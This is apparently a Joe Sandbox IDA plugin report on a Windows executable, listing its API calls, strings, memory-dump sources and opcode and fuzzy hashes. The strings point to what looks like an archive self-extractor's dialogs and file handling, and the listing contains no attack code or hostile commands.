                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemText$DialogWindow
                                                                                                                                        • String ID: RENAMEDLG
                                                                                                                                        • API String ID: 445417207-3299779563
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,007B4A90,?,?,007B4A30,?,007C7F68,0000000C,007B4B87,?,00000002), ref: 007B4AFF
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 007B4B12
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,007B4A90,?,?,007B4A30,?,007C7F68,0000000C,007B4B87,?,00000002,00000000), ref: 007B4B35
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0079F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0079F324
                                                                                                                                          • Part of subcall function 0079F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0079DEC8,Crypt32.dll,?,0079DF4A,?,0079DF2E,?,?,?,?), ref: 0079F346
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0079DED4
                                                                                                                                        • GetProcAddress.KERNEL32(007D1E58,CryptUnprotectMemory), ref: 0079DEE4
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                                        • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                                        • API String ID: 2141747552-1753850145
                                                                                                                                        APIs
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                        APIs
                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 007B89B8
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007B89DB
                                                                                                                                          • Part of subcall function 007B59FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,007B23AA,?,0000015D,?,?,?,?,007B2F29,000000FF,00000000,?,?), ref: 007B5A2E
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 007B8A01
                                                                                                                                        • _free.LIBCMT ref: 007B8A14
                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 007B8A23
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 336800556-0
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,007B5E43,007B5ADF,?,007B634D,00000001,00000364,?,007B2213,?,?,007CCBE8), ref: 007B63A8
                                                                                                                                        • _free.LIBCMT ref: 007B63DD
                                                                                                                                        • _free.LIBCMT ref: 007B6404
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,007CCBE8), ref: 007B6411
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,007CCBE8), ref: 007B641A
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3170660625-0
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 007B9282
                                                                                                                                          • Part of subcall function 007B59C2: RtlFreeHeap.NTDLL(00000000,00000000,?,007B9301,?,00000000,?,00000000,?,007B9328,?,00000007,?,?,007B9725,?), ref: 007B59D8
                                                                                                                                          • Part of subcall function 007B59C2: GetLastError.KERNEL32(?,?,007B9301,?,00000000,?,00000000,?,007B9328,?,00000007,?,?,007B9725,?,?), ref: 007B59EA
                                                                                                                                        • _free.LIBCMT ref: 007B9294
                                                                                                                                        • _free.LIBCMT ref: 007B92A6
                                                                                                                                        • _free.LIBCMT ref: 007B92B8
                                                                                                                                        • _free.LIBCMT ref: 007B92CA
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 007B555D
                                                                                                                                          • Part of subcall function 007B59C2: RtlFreeHeap.NTDLL(00000000,00000000,?,007B9301,?,00000000,?,00000000,?,007B9328,?,00000007,?,?,007B9725,?), ref: 007B59D8
                                                                                                                                          • Part of subcall function 007B59C2: GetLastError.KERNEL32(?,?,007B9301,?,00000000,?,00000000,?,007B9328,?,00000007,?,?,007B9725,?,?), ref: 007B59EA
                                                                                                                                        • _free.LIBCMT ref: 007B556F
                                                                                                                                        • _free.LIBCMT ref: 007B5582
                                                                                                                                        • _free.LIBCMT ref: 007B5593
                                                                                                                                        • _free.LIBCMT ref: 007B55A4
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                        • Opcode ID: d1069f6a8e555a3965864b36d67746d91e8561365334ccb4300ad24d193f16ef
                                                                                                                                        • Instruction ID: 77a4e962c5555a550432370123696a698166fa31f2d0cf52f01ab4b2d705f0bb
                                                                                                                                        • Opcode Fuzzy Hash: d1069f6a8e555a3965864b36d67746d91e8561365334ccb4300ad24d193f16ef
                                                                                                                                        • Instruction Fuzzy Hash: 99F0D0B1913654EB8B126F1CBC86A493BA5FB0C722345810AF4509E271C73D69119F8A
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\file.exe,00000104), ref: 007B4C1A
                                                                                                                                        • _free.LIBCMT ref: 007B4CE5
                                                                                                                                        • _free.LIBCMT ref: 007B4CEF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$FileModuleName
                                                                                                                                        • String ID: C:\Users\user\Desktop\file.exe
                                                                                                                                        • API String ID: 2506810119-1957095476
                                                                                                                                        • Opcode ID: 3d95900dd0d37279edcdea8e4dbb3192619e8e0491febd2413c514c02e6a88aa
                                                                                                                                        • Instruction ID: e0c532c632d60f4107c3072b8042ce23f4e80463335f7db62a68a83c66d7e707
                                                                                                                                        • Opcode Fuzzy Hash: 3d95900dd0d37279edcdea8e4dbb3192619e8e0491febd2413c514c02e6a88aa
                                                                                                                                        • Instruction Fuzzy Hash: 02316671A02258EFDB21DF599C85BDEBFFCEB89710B104056F40497212D7789E40DB65
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 00797468
                                                                                                                                          • Part of subcall function 00793AA3: __EH_prolog.LIBCMT ref: 00793AA8
                                                                                                                                        • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000), ref: 0079752E
                                                                                                                                          • Part of subcall function 00797A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 00797AAC
                                                                                                                                          • Part of subcall function 00797A9D: GetLastError.KERNEL32 ref: 00797AF2
                                                                                                                                          • Part of subcall function 00797A9D: CloseHandle.KERNEL32(?), ref: 00797B01
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                                                        • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                                        • API String ID: 3813983858-639343689
                                                                                                                                        • Opcode ID: 607052b4fd56495d5a37c70581f92be05f30b6a85329ca4d45005910199c77a5
                                                                                                                                        • Instruction ID: 68a44b0a5d498f3d91c43387622135ac037b6757d3aec0f59a4f8d5645c73e7f
                                                                                                                                        • Opcode Fuzzy Hash: 607052b4fd56495d5a37c70581f92be05f30b6a85329ca4d45005910199c77a5
                                                                                                                                        • Instruction Fuzzy Hash: 4131EF71A04248EEDF11EFA8EC0AFEE7B68AF45314F048029F449A7292C77C5E14C7A1
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007912E7: GetDlgItem.USER32(00000000,00003021), ref: 0079132B
                                                                                                                                          • Part of subcall function 007912E7: SetWindowTextW.USER32(00000000,007C02E4), ref: 00791341
                                                                                                                                        • EndDialog.USER32(?,00000001), ref: 007A91AB
                                                                                                                                        • GetDlgItemTextW.USER32(?,00000065,00000000,?), ref: 007A91C0
                                                                                                                                        • SetDlgItemTextW.USER32(?,00000065,?), ref: 007A91D5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemText$DialogWindow
                                                                                                                                        • String ID: ASKNEXTVOL
                                                                                                                                        • API String ID: 445417207-3402441367
                                                                                                                                        • Opcode ID: 88a33e88f8b2b2c0770158746f10ea4adcf335b69be628bedcbb56a7c9781cb2
                                                                                                                                        • Instruction ID: 38fa5feabc3c129880b5807d34cd99e1fe8ccc3ec938016c42b1cec85aff45c0
                                                                                                                                        • Opcode Fuzzy Hash: 88a33e88f8b2b2c0770158746f10ea4adcf335b69be628bedcbb56a7c9781cb2
                                                                                                                                        • Instruction Fuzzy Hash: 3C11CF3224214BBFD6115F64ED8DF563759EF8B701F008114F3019B0A1C36DAC21DB65
                                                                                                                                        APIs
                                                                                                                                        • DialogBoxParamW.USER32(GETPASSWORD1,?,007A9646,?,?), ref: 007AC022
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DialogParam
                                                                                                                                        • String ID: *a}$*a}$GETPASSWORD1
                                                                                                                                        • API String ID: 665744214-282029742
                                                                                                                                        • Opcode ID: 3cdaa938e06a6a35a0060584bfb382b127dc5a69d62d8688af3e1555931cc5eb
                                                                                                                                        • Instruction ID: 81fad2e63c315cd4b901028ad6c645a36a8449a1181f757186e32645cb404df0
                                                                                                                                        • Opcode Fuzzy Hash: 3cdaa938e06a6a35a0060584bfb382b127dc5a69d62d8688af3e1555931cc5eb
                                                                                                                                        • Instruction Fuzzy Hash: 5E115B32244208FBDB22CE34AC05FAB3799BB4A755F048179FD48A7182D6BD5C41D798
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007912E7: GetDlgItem.USER32(00000000,00003021), ref: 0079132B
                                                                                                                                          • Part of subcall function 007912E7: SetWindowTextW.USER32(00000000,007C02E4), ref: 00791341
                                                                                                                                        • EndDialog.USER32(?,00000001), ref: 007A9694
                                                                                                                                        • GetDlgItemTextW.USER32(?,00000065,?,00000080), ref: 007A96AC
                                                                                                                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 007A96DA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemText$DialogWindow
                                                                                                                                        • String ID: GETPASSWORD1
                                                                                                                                        • API String ID: 445417207-3292211884
                                                                                                                                        • Opcode ID: ea6c206cc9b3f747a93b42a36e6d67a1b69d393433c34a3138119c4ea0dd9886
                                                                                                                                        • Instruction ID: 360b1b09bc40728fa21b17046ff1d6c06821218405002d3a9181c68109d02775
                                                                                                                                        • Opcode Fuzzy Hash: ea6c206cc9b3f747a93b42a36e6d67a1b69d393433c34a3138119c4ea0dd9886
                                                                                                                                        • Instruction Fuzzy Hash: 53110432900118B7DB219E74AD49FFA376CEF8A741F004264FB49E2580C6ADAD20D7B1
                                                                                                                                        APIs
                                                                                                                                        • _swprintf.LIBCMT ref: 0079B127
                                                                                                                                          • Part of subcall function 00793F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00793F6E
                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 0079B145
                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 0079B155
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                                                                        • String ID: %c:\
                                                                                                                                        • API String ID: 525462905-3142399695
                                                                                                                                        • Opcode ID: 6fc68f0c6934070f77fa86f72fbd8a61c79677bc820561c9db1a07d79ecee44c
                                                                                                                                        • Instruction ID: 3425b333a616df6f886b31b6b0ed01223513245011a72d1ecc8acd65108bd673
                                                                                                                                        • Opcode Fuzzy Hash: 6fc68f0c6934070f77fa86f72fbd8a61c79677bc820561c9db1a07d79ecee44c
                                                                                                                                        • Instruction Fuzzy Hash: 5E01F953544319B6CF30A775BD45D6BB7ACEF55360B50441BF844C2081FB28D850C2F2
                                                                                                                                        APIs
                                                                                                                                        • InitializeCriticalSection.KERNEL32(000001A0,007D1E74,00000000,?,?,0079FB88,00000020,?,0079A7C2,?,0079C74B,?,00000000,?,00000001,?), ref: 0079F969
                                                                                                                                        • CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,0079A7C2,?,0079C74B,?,00000000,?,00000001,?,?,?,007A3AFF), ref: 0079F973
                                                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,0079A7C2,?,0079C74B,?,00000000,?,00000001,?,?,?,007A3AFF), ref: 0079F983
                                                                                                                                        Strings
                                                                                                                                        • Thread pool initialization failed., xrefs: 0079F99B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                        • String ID: Thread pool initialization failed.
                                                                                                                                        • API String ID: 3340455307-2182114853
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                        • API String ID: 0-56093855
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0079CE57
                                                                                                                                        • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 0079CE66
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FindHandleModuleResource
                                                                                                                                        • String ID: LTR$RTL
                                                                                                                                        • API String ID: 3537982541-719208805
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00797F55,?,?,?), ref: 00799FD0
                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00797F55,?,?), ref: 0079A014
                                                                                                                                        • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00797F55,?,?,?,?,?,?,?,?), ref: 0079A095
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00000000,?,00797F55,?,?,?,?,?,?,?,?,?,?,?), ref: 0079A09C
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Create$CloseHandleTime
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2287278272-0
                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,F5E85006,007B2794,00000000,00000000,007B2FC2,?,007B2FC2,?,00000001,007B2794,F5E85006,00000001,007B2FC2,007B2FC2), ref: 007B9440
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007B94C9
                                                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 007B94DB
                                                                                                                                        • __freea.LIBCMT ref: 007B94E4
                                                                                                                                          • Part of subcall function 007B59FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,007B23AA,?,0000015D,?,?,?,?,007B2F29,000000FF,00000000,?,?), ref: 007B5A2E
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2652629310-0
                                                                                                                                        APIs
                                                                                                                                        • LoadBitmapW.USER32(00000065), ref: 007A9A86
                                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 007A9AA7
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 007A9ACF
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 007A9AEE
                                                                                                                                          • Part of subcall function 007A8BD0: FindResourceW.KERNELBASE(00000066,PNG,?,?,007A9AC8,00000066), ref: 007A8BE1
                                                                                                                                          • Part of subcall function 007A8BD0: SizeofResource.KERNEL32(00000000,75295780,?,?,007A9AC8,00000066), ref: 007A8BF9
                                                                                                                                          • Part of subcall function 007A8BD0: LoadResource.KERNEL32(00000000,?,?,007A9AC8,00000066), ref: 007A8C0C
                                                                                                                                          • Part of subcall function 007A8BD0: LockResource.KERNEL32(00000000,?,?,007A9AC8,00000066), ref: 007A8C17
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 142272564-0
                                                                                                                                        APIs
                                                                                                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 007B1020
                                                                                                                                          • Part of subcall function 007B1658: ___AdjustPointer.LIBCMT ref: 007B16A2
                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 007B1037
                                                                                                                                        • ___FrameUnwindToState.LIBVCRUNTIME ref: 007B1049
                                                                                                                                        • CallCatchBlock.LIBVCRUNTIME ref: 007B106D
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2633735394-0
                                                                                                                                        APIs
                                                                                                                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 007B0B66
                                                                                                                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 007B0B6B
                                                                                                                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 007B0B70
                                                                                                                                          • Part of subcall function 007B1C0E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 007B1C1F
                                                                                                                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 007B0B85
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1761009282-0
                                                                                                                                        • Opcode ID: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                                                                        • Instruction ID: 3759c4f067394081be2ed00b2493951c6087d6aa793c912f86f29b4bde3c6747
                                                                                                                                        • Opcode Fuzzy Hash: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                                                                        • Instruction Fuzzy Hash: 7CC04CA4144240D81C203AB5292E3EF07510C627D97C015D9E891170175F0E444A90B6
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007A8BA5: GetDC.USER32(00000000), ref: 007A8BA9
                                                                                                                                          • Part of subcall function 007A8BA5: GetDeviceCaps.GDI32(00000000,0000000C), ref: 007A8BB4
                                                                                                                                          • Part of subcall function 007A8BA5: ReleaseDC.USER32(00000000,00000000), ref: 007A8BBF
                                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 007A8D24
                                                                                                                                          • Part of subcall function 007A8EEA: GetDC.USER32(00000000), ref: 007A8EF3
                                                                                                                                          • Part of subcall function 007A8EEA: GetObjectW.GDI32(?,00000018,?), ref: 007A8F22
                                                                                                                                          • Part of subcall function 007A8EEA: ReleaseDC.USER32(00000000,?), ref: 007A8FB6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ObjectRelease$CapsDevice
                                                                                                                                        • String ID: (
                                                                                                                                        • API String ID: 1061551593-3887548279
                                                                                                                                        • Opcode ID: ea17af6f8c427578d6bbe31aeea3163fd429d39b54bf440668d8cf7f6dedbcdd
                                                                                                                                        • Instruction ID: 7d32d17e13c2edca89967fac369982e8463a5e7eb6039e7b32fc9f555f624889
                                                                                                                                        • Opcode Fuzzy Hash: ea17af6f8c427578d6bbe31aeea3163fd429d39b54bf440668d8cf7f6dedbcdd
                                                                                                                                        • Instruction Fuzzy Hash: B461F2B1208205EFD250DF64C888E6BBBE9FFC9715F104A5DF599CB260DA35E805CB62
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _swprintf
                                                                                                                                        • String ID: %ls$%s: %s
                                                                                                                                        • API String ID: 589789837-2259941744
                                                                                                                                        • Opcode ID: b33701f888ba248c3c10162c2e2e98630a1b4532bf8b11c221152e09267a284e
                                                                                                                                        • Instruction ID: 1d2cb387515f3f63b44ec85d7f031dffd30efa799a5545268c3dfa0d38fcddbe
                                                                                                                                        • Opcode Fuzzy Hash: b33701f888ba248c3c10162c2e2e98630a1b4532bf8b11c221152e09267a284e
                                                                                                                                        • Instruction Fuzzy Hash: 2A51B53618C300FAEE211A948C4EF257655BBCBF00F20CF0AB786640E6D5DEAC6466D6
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 0079761E
                                                                                                                                        • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00797799
